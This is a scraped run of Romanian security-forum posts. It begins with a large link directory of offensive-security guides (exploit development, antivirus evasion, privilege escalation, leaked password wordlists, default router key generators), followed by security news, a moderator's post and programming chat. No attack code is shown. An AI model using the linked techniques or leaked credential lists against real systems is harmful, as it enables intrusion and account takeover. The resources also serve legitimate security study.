http://sickness.tor.hu/?p=368 [Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt - http://sickness.tor.hu/?p=378 [TechHumor] Title - [TechHumor] Title - http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html Exploit Development (Case Studies/Walkthroughs) [Web] Finding 0days in Web Applications - http://www.exploit-db.com/finding-0days-in-web-applications/ [Windows] Offensive Security Exploit Weekend - http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/ [Windows] From vulnerability to exploit under 5 min - http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html Exploit Development (Patch Analysis) [Windows] A deeper look at ms11-058 - http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058 [Windows] Patch Analysis for MS11-058 - https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058 [Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability - http://j00ru.vexillium.org/?p=893 [Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities - https://www.net-security.org/article.php?id=1613 Exploit Development (Metasploit Wishlist) [ExplotDev] Metasploit Exploits Wishlist ! - http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html [Guide] Porting Exploits To Metasploit Part 1 - http://www.securitytube.net/video/2118 Passwords & Rainbow Tables (WPA) [RSS] Title - http://ob-security.info/?p=475 [RSS] Title - http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/ [RSS] Title - http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html [WPA] Offensive Security: WPA Rainbow Tables - http://www.offensive-security.com/wpa-tables/ [Tool] Ultra High Security Password Generator - https://www.grc.com/passwords.htm [Guide] Creating effective dictionaries for password attacks - http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html [Leaked] Diccionarios con Passwords de Sitios Expuestos - http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml [Download] Index of / - http://svn.isdpodcast.com/wordlists/ [Guide] Using Wikipedia as brute forcing dictionary - http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary [Tool] CeWL - Custom Word List generator - http://www.digininja.org/projects/cewl.php [Download] Title - http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists [Leaked] Passwords - http://www.skullsecurity.org/wiki/index.php/Passwords Cheat-Sheets [OS] A Sysadmin's Unixersal Translator - http://bhami.com/rosetta.html [WiFi] WirelessDefence.org's Wireless Penetration Testing Framework - http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html Anti-Virus [Metasploit] Facts and myths about antivirus evasion with Metasploit - http://schierlm.users.sourceforge.net/avevasion.html [Terms] Methods of bypassing Anti-Virus (AV) Detection - NetCat - http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html Privilege Escalation [Linux] Hacking Linux Part I: Privilege Escalation - http://www.dankalia.com/tutor/01005/0100501004.htm [Windows] Windows 7 UAC whitelist - http://www.pretentiousname.com/misc/win7_uac_whitelist2.html [Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges - http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/ Metasploit [Guide] fxsst.dll persistence: the evil fax machine - http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html [Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec - http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/ [Guides] Metasploit Unleashed - http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training [Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 - http://www.securitytube.net/video/1175 Default Generators [WEP] mac2wepkey - Huawei default WEP generator - http://websec.ca/blog/view/mac2wepkey_huawei [WEP] Generator: Attacking SKY default router password - http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password Statistics [Defacements] Zone-H - http://www.zone-h.org [ExploitKits] CVE Exploit Kit list - http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm Cross Site Scripting (XSS) [Guide] vbSEO – From XSS to Reverse PHP Shell - http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ [RSS] Title - http://www.thespanner.co.uk/2009/03/25/xss-rays/ Podcasts [Weekly] PaulDotCom - http://pauldotcom.com/podcast/psw.xml [Monthly] Social-Engineer - http://socialengineer.podbean.com/feed/ Blogs & RSS [RSS] SecManiac - http://www.secmaniac.com [Guides] Carnal0wnage & Attack Research - http://carnal0wnage.attackresearch.com [RSS] Contagio - http://contagiodump.blogspot.com [News] THN : The Hacker News - http://thehackernews.com [News] Packet Storm: Full Disclosure Information Security - http://packetstormsecurity.org [Guides] pentestmonkey | Taking the monkey work out of pentesting - http://pentestmonkey.net [RSS] Darknet - The Darkside | Ethical Hacking, Penetration Testing & Computer Security - http://www.darknet.org.uk [RSS] Irongeek - http://www.irongeek.com [Metasploit] Room 363 - http://www.room362.com [Guides] Question Defense: Technology Answers For Technology Questions - http://www.question-defense.com/ [Guides] stratmofo's blog - http://securityjuggernaut.blogspot.com [Guides] TheInterW3bs - http://theinterw3bs.com [Guides] consolecowboys - http://console-cowboys.blogspot.com [Guides] A day with Tape - http://adaywithtape.blogspot.com [Guides] Cybexin's Blog - Network Security Blog - http://cybexin.blogspot.com [RSS] BackTrack Linux - Penetration Testing Distribution - http://www.backtrack-linux.org/feed/ [RSS] Offensive Security - http://www.offensive-security.com/blog/feed/ [RSS] Title - http://www.pentestit.com [RSS] Title - http://michael-coates.blogspot.com [RSS] Title - http://blog.0x0e.org [RSS] Title - http://0x80.org/blog [RSS] Title - http://archangelamael.shell.tor.hu [RSS] Title - http://archangelamael.blogspot.com [RSS] Title - http://www.coresec.org [RSS] Title - http://noobys-journey.blogspot.com [RSS] Title - http://www.get-root.com [RSS] Title - http://www.kislaybhardwaj.com [RSS] Title - https://community.rapid7.com/community/metasploit/blog [RSS] Title - http://mimetus.blogspot.com [RSS] Title - http://hashcrack.blogspot.com [RSS] Title - https://rephraseit.wordpress.com [RSS] Title - http://www.exploit-db.com [RSS] Title - http://skidspot.blogspot.com [RSS] Title - http://grey-corner.blogspot.com [RSS] Title - http://vishnuvalentino.com [RSS] Title - http://ob-security.info Sursa: http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html

New, Faster Firefox 9 Beta is Ready for Testing November 10th, 2011 A new Firefox Beta for Windows, Mac and Linux is now available for download and testing. This beta enhances JavaScript performance and adds developer tools that make Web browsing much faster. What’s New in Firefox Beta: Type Inference: Firefox Beta adds Type Inference to make JavaScript significantly faster. To learn more about how rich websites and Web apps with lots of pictures, videos and 3D graphics will load faster in Firefox, check out this blog post. Mac OS X Lion Support: Firefox Beta has a new look that matches the Mac OS X Lion application toolbar and icon styles. Firefox Beta also supports the two finger swipe navigation gesture and makes it easier to use multiple monitors. Do Not Track JavaScript Detection: Firefox Beta enables JavaScript to show developers when users choose to opt-out of behavioral tracking with the Do Not Track privacy feature. Chunked XHR Support: Firefox Beta supports chunking for XHR requests so websites can receive data that’s part of a large XHR download in progress. This helps developers make websites and Web apps faster, especially those that download large sets of data or via AJAX. If you’re a developer, please visit the Firefox for Developers page. Download: http://www.mozilla.org/en-US/firefox/channel/

Disable AutoRun to Stop 50% of Windows Malware Threats According to a biannual Security Intelligence Report from Microsoft, AutoRun—the feature in Windows that automatically executes files when you plug in a USB or connect to a network—accounts for almost half of all malware infections. That's really damn high. To be clear, these are infections that don't require any user-input from you, so it's kind of not your fault that your computer gets infected. By turning off AutoRun, you'll add an extra step to certain tasks, but it's worth it to cut down on malware 50%. What's also interesting in this report is that Windows XP SP3 systems get infected about ten times as much as Windows 7 SP1 64-bit systems, and six times as much vs. 32-bit Windows 7 systems. That alone is one reason why you might want to upgrade your parents' machines to Windows 7. The easiest way to disable AutoRun is to download a free utility like Disable AutoRun or previously mentioned Panda USB Vaccine, run it, and call it a day (these apps are made specifically to turn off AutoRun). On the other hand, if you're comfortable with editing the registry, here's a quick guide to doing it yourself. Disable autorun: http://antivirus.about.com/od/securitytips/ht/autorun.htm USB Vaccine: http://www.pandasecurity.com/homeusers/downloads/usbvaccine/ Sursa: http://lifehacker.com/5858703/disable-autorun-to-stop-50-of-windows-malware-threats

Suricata IDPE 1.1 Site openinfosecfoundation.org Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools. Changes: Performance, accuracy, and stability were improved. Many HTTP rule keywords added. Several SSL keywords have been added. Event suppression support was added. SCTP decoding support was added. IPS mode was improved. An SMTP parser was added. Protocol detection was improved. Extended HTTP output was added. AF_PACKET support was added. PF_RING support was improved. Pcap logging was added. The stream engine was improved. Download: http://packetstormsecurity.org/files/download/106889/suricata-1.1.tar.gz

Postul e prea lung, vorbesc cu kwe. Nu e problema cu postul dublu, in cazul de fata.

1. Nu esti singura persoana care a primit warn pentru asa ceva, dar esti singura care se plange 2. La categoria offtopic se posteaza lucruri care nu au locul intr-o alta categorie, iar topicul tau (chiar nu am idee care) care era o cerere, isi avea locul la categoria Cereri speciala pentru asa ceva. 3. Am mutat topicul pentru a mentine ordinea pe forum, adica fiecare topic sa fie la locul lui, pentru ca oamenii sa stie ce si unde gasesc, nu sa gaseasca discutii despre "Huidu a facut accident" la Programare sau Tutoriale engleza. 4. Daca te uitai la topicurile de la Anunturi, observai ca unul dintre ele specifica motivele pentru care se poate primi avertisment, iar postatul aiurea, intr-o categorie gresita este unul dintre ele 5. Nu imi face placere sa mut topicuri de colo-colo. Da, daca era ceva util multora, cum s-a mai intamplat nu primeai avertisment. Adica am mutat un topic despre programare de la Tutoriale la Programare si chiar am dat "+" celui care a postat pentru ca era ceva util. 6. Daca tot erai pe la offtopic, observai ca am creat vreo 3 threaduri acolo in care specificam in mod explicit ca topicurile la care se cere ajutorul si cererile au categorii speciale si nu trebuie postate acolo. 7. Am inceput sa nu mai tolerez topicurile care nu au legatura cu IT-ul aici si ar trebui sa intelegi de ce. Ar fi cam stupid sa vezi pe aici numai topicuri ca "Am parul aspru si varfurile despicate, ce pot face?" sau alte rahaturi. 8. Eu nu stiu de niciun "orice tip de cereri". E un forum de IT, sa incercam sa pastram continutul de IT, sa nu incepem toti cu probleme personale. Exista 4chan, softpedia si alte forumuri care probabil au categorii speciale pentru orice. Intelegi?

La ce functii te referi? Probabil acele functii se gasesc in "msvcrt.dll" - Microsoft Visual C Runtime, adica un DLL care contine functiile uzuale. Mi s-a parut putin ciudat, dar chiar ieri asta faceam, si am vazut ca un program compilat cu MinGW (portarea compilatorului GCC pe Windows) "leaga" executabilele tot de msvcrt.dll. Nu e nevoie sa fie definite in headere, nu sunt, functiile fac parte din diferite librarii (WinAPI de exemplu - kernel32.dll, user32.dll...) cu care programul tau e legat prin intermediul link-erului. Tu ai nevoie doar de definitia functiei si de librarie, ca sa stie link-erul de unde sa ia functia. Ca idee, functia "connect", cu care conectez un socket la o adresa IP se afla in ws2_32.dll, se include fisierul winsock2.h, dar nu e de ajuns, pentru ca trebuie stiuta si libraria in care se afla, si asta trebuie specificat printr-un parametru la compilator: -l. CodeBlocks are GUI pentru asa ceva, fisierele necesare au extensiile ".lib" sau ".a".

Si daca cineva atinge usor oglinda din greseala?

Lasati prostiile, haideti sa mergem la Hanul Drumetului :->

em, cred ca vrei sa zici: char x = 49; Adica x e codul ASCII al caracterului '1'.

Mexican drug runners torture and decapitate blogger El Mod of social network ritually murdered By John Leyden 10th November 2011 11:31 GMT The moderator of a Mexican social network has been tortured and ritually murdered by local drug lords in the latest cartel-related killing in the country. The victim, identified in an accompanying message as "El Rascatripas" (The Fiddler/Scratcher) was tortured and decapitated before his body was dumped in the early hours of Wednesday morning beside a statue of Christopher Columbus near the Texas border and outside the town of Nuevo Laredo. A blanket placed near the body featured a chilling message, scrawled in ink: "Hi I’m ‘Rascatripas’ and this happened to me because I didn’t understand I shouldn’t post things on social networks." Local reports suggest the man was a moderator on the social network Nuevo Laredo en Vivo. His death brings the death toll of bloggers and social media activists in the town – all apparent victims of the ultra-ruthless Zetas cartel – to four over the last two months. A man and a woman, who was disembowelled beforehand, were found strung from an overpass in the town in mid-September. Less than two weeks later, Nuevo Laredo en Vivo moderator Marisol Macias Castaneda, also known as The Laredo Girl, was decapitated and dumped – like the latest victim – by the Christopher Columbus statue. More details, including a grisly picture of the crime scene, can be found in local media reports here and here. A bloody turf war between the Gulf Cartel (CDG) and their former enforcers, Los Zetas, is at its bloodiest in the states of eastern Tamaulipas, around the northern city of Monterrey and in Tamaulipas (the location of Nuevo Laredo). Some estimates suggest that as many as 40,000 Mexicans had lost their lives as a result of the escalating Mexican drug wars, which have included a terrorist-style attack on a Monterrey casino in August that claimed the lives of 53 people. The April 2011 Tamaulipas massacre, involving the execution of an estimated 190-plus abducted bus passengers, and the Monterrey casino attack had both been blamed on the Zetas. Wired reports that locals are using social media tools to carry real-time reporting of firefights between drug runners and local police and cartel checkpoints on the region's dangerous roads as well as criticism of local drug lords. Drug cartels, in particular the Zetas, take a ruthless line on those reporting their activities online, treating them as snitches and murdering them as a grisly warning to others. Recent plans by a faction of Anonymous to release details of associates of Los Zetas were abandoned last weekend amid confusion over whether the alleged kidnapping of a member of the activists collective, the incident that provoked OpCartel, had ever actually taken place. Sursa: http://www.theregister.co.uk/2011/11/10/narco_blogger_murdered/

Daca deschizi cmd cu "Run as Administrator" e la fel? Zic asta pentru ca m-am chinuit si eu ore sa inteleg un cod valid care nu mergea pentru ca trebuia rulat ca Administrator... PS: Posteaza codul sursa daca poti, eu as fi interesat sa ma uit peste el.

C:\Windows>telnet www.rstcenter.com 80 GET / HTTP/1.1 Host: www.rstcenter.com HTTP/1.1 200 OK Server: LBA T2900 LINUX SECURITY GROUP Date: Thu, 10 Nov 2011 15:34:28 GMT Content-Type: text/html Connection: keep-alive Last-Modified: Wed, 03 Nov 2010 23:06:25 GMT ETag: "759ff-27-4942e172bde40" Accept-Ranges: bytes Content-Length: 39 Cache-Control: max-age=7200 Expires: Thu, 10 Nov 2011 17:34:28 GMT <img src="stfu.jpg" alt="" title="" /> Connection to host lost. C:\Windows> Asta e fara browser.

Eu ma gandesc in primul rand la mine, normal. Si ma intreb: "Ce am facut eu rau sa vrea garda sa ma ia?", si nu imi trece absolut nimic prin cap. Deci nu am niciun stres si la fel sunt si 96% (sa zicem) dintre cei de aici. Apoi, daca ma gandesc putin, imi dau seama ca din posturile mele reies multe lucruri: numele si prenumele, liceul la care am fost, facultatea la care sunt si altele. Pe un forum de "trading", unde se faceau tranzactii de milioane de dolari (carduri si alte lucruri nasoale) cica se infiltrase un agent FBI, activase mult timp si chiar ajunsese administrator ceva si dintr-o data au saltat o mare parte dintre ei. Dar acolo era vorba de bani, nu de conturi filelist date pe 1 euro credit cum se face aici. Ce-i drept vazusem intr-o zi un IP de STS pe aici, dar sunt si ei oameni, practic tot ca noi, care poate mai gasesc cine stie ce informatii utile aici, nu prea cred ca "spioneaza" pe cineva pentru ca, sa fim seriosi, chiar nu au pe cine (v-am ranit orgoliile de hackeri nu?).

Computerized Prison doors hacked with vulnerabilities used by Stuxnet worm Security holes in the computer systems of federal prisons in the United States can effectively allow hackers to trigger a jailbreak by remote control. The discovery of the Stuxnet worm has alerted governments around the world about the possibility of industrial control systems being targeted by hackers. A team of researchers with John Strauchs, Tiffany Rad and Teague Newman presented their findings at a recent security conference. They said the project wasn't really all that difficult -- it just took a little time, some equipment bought online and a basement workspace. The idea for the research came about from work that Strauchs had done previously. "I designed a maximum security prison security system. That is, I did the engineering quite a few years ago and literally on Christmas Eve, the warden of that prison after it was occupied, called me and told me all the doors had popped open, including on death row, which of course sent chills down my spine. So we fixed that problem very quickly. It was a minor technical thing that had to do with the equipment used, but the gist of it was it made me think if that could be done accidentally, what was the extent of what you could do if you did it deliberately?" The security systems in most American prisons are run by special computer equipment called industrial control systems, or ICS. They are also used to control power plants, water treatment facilities and other critical national infrastructure. ICS has increasingly been targeted by hackers because an attack on one such system successfully sabotaged Iran’s nuclear program in 2009.A malicious cyber-intruder could “destroy the doors,” by overloading the electrical system that controls them, locking them permanently open, said Mr. Strauchs, now a consultant who has designed security systems for dozens of state and federal prisons. The U.S. Department of Homeland Security has confirmed the validity of their results and the researchers have already demonstrated the attack to federal and state Bureaus of Prisons and a number of federal agencies. Sursa: http://thehackernews.com/2011/11/computerized-prison-doors-hacked-with.html

Da, nici eu nu vreau sa dau 8-10 lei pe o bere.